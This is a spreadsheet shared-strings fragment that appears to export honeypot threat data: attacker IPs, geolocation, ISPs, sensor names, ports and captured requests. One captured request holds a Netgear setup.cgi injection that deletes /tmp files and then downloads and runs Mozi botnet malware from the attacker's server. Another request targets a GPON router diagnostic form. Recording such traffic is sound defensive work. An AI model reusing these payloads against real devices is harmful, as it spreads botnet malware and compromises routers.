  </si>
  <si>
    <t>1998-12-08</t>
  </si>
  <si>
    <t>{Data_HTTPS:{'Accept': 'text/plain,text/html', 'Host': '103.211.202.140', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': 'text/plain,text/html', 'Host': '5.180.55.39', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:d49c:5fc6</t>
  </si>
  <si>
    <t>40d202a471d4efdee2b1ae50d16dbcef</t>
  </si>
  <si>
    <t>117.216.19.206</t>
  </si>
  <si>
    <t>::ffff:75d8:13ce</t>
  </si>
  <si>
    <t>b3726869bec5631e80f33d5a94bf8936</t>
  </si>
  <si>
    <t>103.235.198.78</t>
  </si>
  <si>
    <t>Kathmandu</t>
  </si>
  <si>
    <t>Kathmandu (Jamal)</t>
  </si>
  <si>
    <t>1283240</t>
  </si>
  <si>
    <t>27.7105</t>
  </si>
  <si>
    <t>85.3146</t>
  </si>
  <si>
    <t>4007</t>
  </si>
  <si>
    <t>SUBISU-CABLENET-AS-AP</t>
  </si>
  <si>
    <t>Ccnep</t>
  </si>
  <si>
    <t>::ffff:67eb:c64e</t>
  </si>
  <si>
    <t>a7ec3c241f878c2346da351527739d72</t>
  </si>
  <si>
    <t>117.195.1.255</t>
  </si>
  <si>
    <t>::ffff:75c3:1ff</t>
  </si>
  <si>
    <t>36b85275fd3ef463e8329fffb1911678</t>
  </si>
  <si>
    <t>182.60.225.88</t>
  </si>
  <si>
    <t>::ffff:b63c:e158</t>
  </si>
  <si>
    <t>cca2059b608dacb108fcda21113f0806</t>
  </si>
  <si>
    <t>88.177.165.19</t>
  </si>
  <si>
    <t>88-177-165-19.subs.proxad.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36</t>
  </si>
  <si>
    <t>ARA</t>
  </si>
  <si>
    <t>Auvergne-Rhône-Alpes</t>
  </si>
  <si>
    <t>Puy-de-Dôme</t>
  </si>
  <si>
    <t>Clermont-Ferrand</t>
  </si>
  <si>
    <t>3024635</t>
  </si>
  <si>
    <t>63000</t>
  </si>
  <si>
    <t>45.7807</t>
  </si>
  <si>
    <t>3.0915</t>
  </si>
  <si>
    <t>12322</t>
  </si>
  <si>
    <t>Free SAS</t>
  </si>
  <si>
    <t>ProXad network / Free SAS</t>
  </si>
  <si>
    <t>Proxad / Free SAS</t>
  </si>
  <si>
    <t>::ffff:58b1:a513</t>
  </si>
  <si>
    <t>6ae33b165a8539cb08947454b994dc4a</t>
  </si>
  <si>
    <t>103.21.65.242</t>
  </si>
  <si>
    <t>HoneyPot BlackListed IP&amp;&amp;Execution-From-C&amp;C-Server-Exploit-Attempt&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;abuse.ch&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_SSH_H5&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H24</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;30424&amp;&amp;NA&amp;&amp;80&amp;&amp;22</t>
  </si>
  <si>
    <t>RI</t>
  </si>
  <si>
    <t>Riau</t>
  </si>
  <si>
    <t>Kampar Regency</t>
  </si>
  <si>
    <t>Bangkinang</t>
  </si>
  <si>
    <t>1650285</t>
  </si>
  <si>
    <t>28411</t>
  </si>
  <si>
    <t>0.33308699999999997</t>
  </si>
  <si>
    <t>101.022</t>
  </si>
  <si>
    <t>150982</t>
  </si>
  <si>
    <t>Dinas Komunikasi, Informatika dan Persandian Kabupaten Kampar</t>
  </si>
  <si>
    <t>Dinas Komunikasi</t>
  </si>
  <si>
    <t>2023-04-17</t>
  </si>
  <si>
    <t>IDNIC-DISKOMINFOKABUPATENKAMPAR-ID</t>
  </si>
  <si>
    <t>connection&amp;&amp;GET&amp;&amp;POST</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'method': 'GET', 'uri': '/setup.cgi?next_file=netgear.cfg&amp;todo=syscmd&amp;cmd=rm+-rf+/tmp/*;wget+http://103.21.65.242:48342/Mozi.m+-O+/tmp/netgear;sh+netgear&amp;curpath=/&amp;currentsetting.htm=1'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '118', 'Host': '127.0.0.1:80', 'User-Agent': 'Hello, World', 'method': 'POST', 'uri': '/GponForm/diag_Form?images/'}}</t>
  </si>
  <si>
    <t>::ffff:6715:41f2</t>
  </si>
  <si>
    <t>15adcf5536c87d58be5d4c846e77b6f9</t>
  </si>
  <si>
    <t>98.152.200.3</t>
  </si>
  <si>
    <t>syn-098-152-200-003.biz.spectrum.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_REDIS_H10&amp;&amp;SMA-LAB_REDIS_H18&amp;&amp;SMA-LAB_REDIS_H35&amp;&amp;SMA-LAB_REDIS_H44&amp;&amp;SMA-LAB_SSH_H46&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_IPP_H23&amp;&amp;SMA-LAB_LDAP_H30&amp;&amp;SMA-LAB_SMB_H12&amp;&amp;SMA-LAB_PJL_H31&amp;&amp;SMA-LAB_HTTPS_H23&amp;&amp;SMA-LAB_SOCKS5_H26&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_REDIS_H27&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_REDIS_H34&amp;&amp;SMA-LAB_REDIS_H28&amp;&amp;SMA-LAB_REDIS_H8&amp;&amp;SMA-LAB_REDIS_H15&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_REDIS_H39&amp;&amp;SMA-LAB_REDIS_H6&amp;&amp;SMA-LAB_REDIS_H13&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_REDIS_H7&amp;&amp;SMA-LAB_REDIS_H31&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_REDIS_H30&amp;&amp;SMA-LAB_REDIS_H32&amp;&amp;SMA-LAB_REDIS_H29&amp;&amp;SMA-LAB_SSH_H46&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_REDIS_H20&amp;&amp;SMA-LAB_MT-CPA_H34</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;6379&amp;&amp;22&amp;&amp;80&amp;&amp;631&amp;&amp;389&amp;&amp;445&amp;&amp;9100&amp;&amp;443&amp;&amp;1080&amp;&amp;32145&amp;&amp;13375&amp;&amp;22&amp;&amp;37751&amp;&amp;12315&amp;&amp;30490&amp;&amp;3589&amp;&amp;27177&amp;&amp;NA</t>
  </si>
  <si>
    <t>Brea</t>
  </si>
  <si>
    <t>5330582</t>
  </si>
  <si>
    <t>92821</t>
  </si>
  <si>
    <t>33.9196</t>
  </si>
  <si>
    <t>-117.882</t>
  </si>
  <si>
    <t>20001</t>
  </si>
  <si>
    <t>Trans Ocean Resources Management</t>
  </si>
  <si>
    <t>2007-12-18</t>
  </si>
  <si>
    <t>RRWE</t>
  </si>
  <si>
    <t>2009-12-11</t>
  </si>
  <si>
    <t>1994-07-27 04:00:00</t>
  </si>
  <si>
    <t>2025-07-26 04:00:00</t>
  </si>
  <si>
    <t>2024-07-22 05:41:39</t>
  </si>
  <si>
    <t>['NS1.CHARTER.COM', 'NS2.CHARTER.COM', 'NS3.CHARTER.COM', 'NS4.CHARTER.COM']</t>
  </si>
  <si>
    <t>Domain Admin</t>
  </si>
  <si>
    <t>['domainabuse@cscglobal.com', 'hostmaster@charter.com']</t>
  </si>
  <si>
    <t>12405 Powerscourt Drive</t>
  </si>
  <si>
    <t>::ffff:6298:c803</t>
  </si>
  <si>
    <t>d73f58ad505080e7dd296cccaf722d7e</t>
  </si>
  <si>
    <t>117.200.179.195</t>
  </si>
  <si>
    <t>::ffff:75c8:b3c3</t>
  </si>
  <si>
    <t>bc34b2ab356c10a5764110e223a4383f</t>
  </si>
  <si>
    <t>112.196.2.195</t>
  </si>
  <si>
    <t>1433&amp;&amp;3389&amp;&amp;28059</t>
  </si>
  <si>
    <t>1264728</t>
  </si>
  <si>
    <t>141001</t>
  </si>
  <si>
    <t>30.901</t>
  </si>
  <si>
    <t>75.8573</t>
  </si>
  <si>
    <t>Dayanand Medical College and Hospital</t>
  </si>
  <si>
    <t>DAYANAND_MEDICAL_COLLEGE_AND_HOSPITAL</t>
  </si>
  <si>
    <t>connection&amp;&amp;login&amp;&amp;stshash&amp;&amp;NA</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hello'}}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:70c4:2c3</t>
  </si>
  <si>
    <t>e4a9175561d9b5ce17d350d81e952b79</t>
  </si>
  <si>
    <t>113.191.141.73</t>
  </si>
  <si>
    <t>::ffff:71bf:8d49</t>
  </si>
  <si>
    <t>cefab3217b7517b974918a2b6b6d1b68</t>
  </si>
  <si>
    <t>59.182.241.239</t>
  </si>
  <si>
    <t>::ffff:3bb6:f1ef</t>
  </si>
  <si>
    <t>d518a26abc269091adb0b89ce226e1fa</t>
  </si>
  <si>
    <t>117.216.148.192</t>
  </si>
  <si>
    <t>::ffff:75d8:94c0</t>
  </si>
  <si>
    <t>82554f58faaef05fc01becd3d6012a34</t>
  </si>
  <si>
    <t>222.105.169.147</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H30</t>
  </si>
  <si>
    <t>Jeollabuk-do</t>
  </si>
  <si>
    <t>Jeonju-si</t>
  </si>
  <si>
    <t>Jeonju-si (Pyeonghwadong 1(il)-ga)</t>
  </si>
  <si>
    <t>1845453</t>
  </si>
  <si>
    <t>35.7969</t>
  </si>
  <si>
    <t>127.14</t>
  </si>
  <si>
    <t>KT</t>
  </si>
  <si>
    <t>2003-10-27</t>
  </si>
  <si>
    <t>::ffff:de69:a993</t>
  </si>
  <si>
    <t>a167b00b396fab3740ef83b08766f03a</t>
  </si>
  <si>
    <t>121.131.175.245</t>
  </si>
  <si>
    <t>Seodaemun-gu</t>
  </si>
  <si>
    <t>1836701</t>
  </si>
  <si>
    <t>120013</t>
  </si>
  <si>
    <t>37.5764</t>
  </si>
  <si>
    <t>126.935</t>
  </si>
  <si>
    <t>::ffff:7983:aff5</t>
  </si>
  <si>
    <t>0341ea10df4c7dc763eec1a259ac297f</t>
  </si>
  <si>
    <t>66.61.96.154</t>
  </si>
  <si>
    <t>NA&amp;&amp;syn-066-061-096-154.res.spectrum.com</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H8&amp;&amp;SMA-LAB_IRC_H19&amp;&amp;SMA-LAB_SMTP_H24&amp;&amp;SMA-LAB_NTP_H32&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_SOCKS5_H10&amp;&amp;SMA-LAB_MYSQL_H38&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H41</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;6667&amp;&amp;25&amp;&amp;123&amp;&amp;445&amp;&amp;1080&amp;&amp;3306&amp;&amp;44483&amp;&amp;23</t>
  </si>
  <si>
    <t>5188843</t>
  </si>
  <si>
    <t>16506</t>
  </si>
  <si>
    <t>42.0591</t>
  </si>
  <si>
    <t>-80.154</t>
  </si>
  <si>
    <t>10796</t>
  </si>
  <si>
    <t>2001-01-03</t>
  </si>
  <si>
    <t>RR-MID-ATLANTIC</t>
  </si>
  <si>
    <t>2011-07-06</t>
  </si>
  <si>
    <t>::ffff:423d:609a</t>
  </si>
  <si>
    <t>6fca949b57e8481aceb484b248907cd5</t>
  </si>
  <si>
    <t>118.34.117.189</t>
  </si>
  <si>
    <t>NA&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H3</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;23&amp;&amp;80</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Connection': 'close', 'Host': '127.0.0.1', 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7622:75bd</t>
  </si>
  <si>
    <t>14bbe9665a6214e5d1514ef8908db657</t>
  </si>
  <si>
    <t>221.158.143.67</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H26</t>
  </si>
  <si>
    <t>23&amp;&amp;57120&amp;&amp;38078&amp;&amp;38131&amp;&amp;38109&amp;&amp;80&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>Daejeon</t>
  </si>
  <si>
    <t>Gwanjeo-dong</t>
  </si>
  <si>
    <t>8691930</t>
  </si>
  <si>
    <t>302243</t>
  </si>
  <si>
    <t>36.2947</t>
  </si>
  <si>
    <t>127.333</t>
  </si>
  <si>
    <t>{Data_TELNET:NA}&amp;&amp;NA&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dd9e:8f43</t>
  </si>
  <si>
    <t>4a6108e9bda5a0aa574f8b53a6c1e415</t>
  </si>
  <si>
    <t>14.39.170.5</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_SSH_H4&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_HTTP_H3</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA&amp;&amp;22&amp;&amp;59055&amp;&amp;54935&amp;&amp;54945&amp;&amp;80&amp;&amp;9100&amp;&amp;16633</t>
  </si>
  <si>
    <t>login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Connection': 'close', 'Host': '127.0.0.1', 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:e27:aa05</t>
  </si>
  <si>
    <t>c027269899a3e842a917240017d281c8</t>
  </si>
  <si>
    <t>125.132.78.181</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_MT-CPA_H5</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;59334&amp;&amp;25467&amp;&amp;50635&amp;&amp;55358&amp;&amp;55367&amp;&amp;55385&amp;&amp;9100&amp;&amp;80&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7d84:4eb5</t>
  </si>
  <si>
    <t>42b1fa4acdc81078760cefa40a7ebede</t>
  </si>
  <si>
    <t>117.217.243.97</t>
  </si>
  <si>
    <t>::ffff:75d9:f361</t>
  </si>
  <si>
    <t>b5f150dfa5c422ca5fe4916f9a640b89</t>
  </si>
  <si>
    <t>64.185.110.190</t>
  </si>
  <si>
    <t>Washington</t>
  </si>
  <si>
    <t>Walla Walla</t>
  </si>
  <si>
    <t>5814916</t>
  </si>
  <si>
    <t>99362</t>
  </si>
  <si>
    <t>46.08</t>
  </si>
  <si>
    <t>-118.287</t>
  </si>
  <si>
    <t>23265</t>
  </si>
  <si>
    <t>Pocketinet Communications, Inc</t>
  </si>
  <si>
    <t>2003-02-04</t>
  </si>
  <si>
    <t>POCKETINET-1</t>
  </si>
  <si>
    <t>2012-02-24</t>
  </si>
  <si>
    <t>::ffff:40b9:6ebe</t>
  </si>
  <si>
    <t>1b012ac1576c3e9bcf8bb3ad804219e8</t>
  </si>
  <si>
    <t>176.90.81.24</t>
  </si>
  <si>
    <t>::ffff:b05a:5118</t>
  </si>
  <si>
    <t>6e39fa938021574bba741a19c5b46f5e</t>
  </si>
  <si>
    <t>182.74.118.178</t>
  </si>
  <si>
    <t>BHARTI-IN</t>
  </si>
  <si>
    <t>::ffff:b64a:76b2</t>
  </si>
  <si>
    <t>24503bf8a625a77b437aa69c80d23f53</t>
  </si>
  <si>
    <t>103.55.22.22</t>
  </si>
  <si>
    <t>SMA-LAB_REDIS_H2&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>6379&amp;&amp;29808&amp;&amp;1433</t>
  </si>
  <si>
    <t>SU</t>
  </si>
  <si>
    <t>North Sumatra</t>
  </si>
  <si>
    <t>Kota Tanjung Balai</t>
  </si>
  <si>
    <t>Tanjungbalai</t>
  </si>
  <si>
    <t>1213547</t>
  </si>
  <si>
    <t>2.83506</t>
  </si>
  <si>
    <t>99.8795</t>
  </si>
  <si>
    <t>150490</t>
  </si>
  <si>
    <t>PT General Media Network</t>
  </si>
  <si>
    <t>::ffff:6737:1616</t>
  </si>
  <si>
    <t>9720b7284cf010d804ae96a3f34bcc44</t>
  </si>
  <si>
    <t>116.193.129.247</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H29</t>
  </si>
  <si>
    <t>Konnagar</t>
  </si>
  <si>
    <t>1266179</t>
  </si>
  <si>
    <t>22.7051</t>
  </si>
  <si>
    <t>88.3445</t>
  </si>
  <si>
    <t>ALLIANCEBROADBAND</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (116.193.129.247,57232)}&amp;&amp;{Data_SMB:Incoming connection (116.193.129.247,57865)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:74c1:81f7</t>
  </si>
  <si>
    <t>c4fb72c1efe6f3ee2348bf8474e1f75a</t>
  </si>
  <si>
    <t>220.71.187.171</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_IPP_H2&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_HTTPS_H34&amp;&amp;SMA-LAB_ORACLE_H26&amp;&amp;SMA-LAB_VNC_H43&amp;&amp;SMA-LAB_DNS_H40&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H36</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;631&amp;&amp;143&amp;&amp;443&amp;&amp;1521&amp;&amp;5900&amp;&amp;53&amp;&amp;445&amp;&amp;7247&amp;&amp;23&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
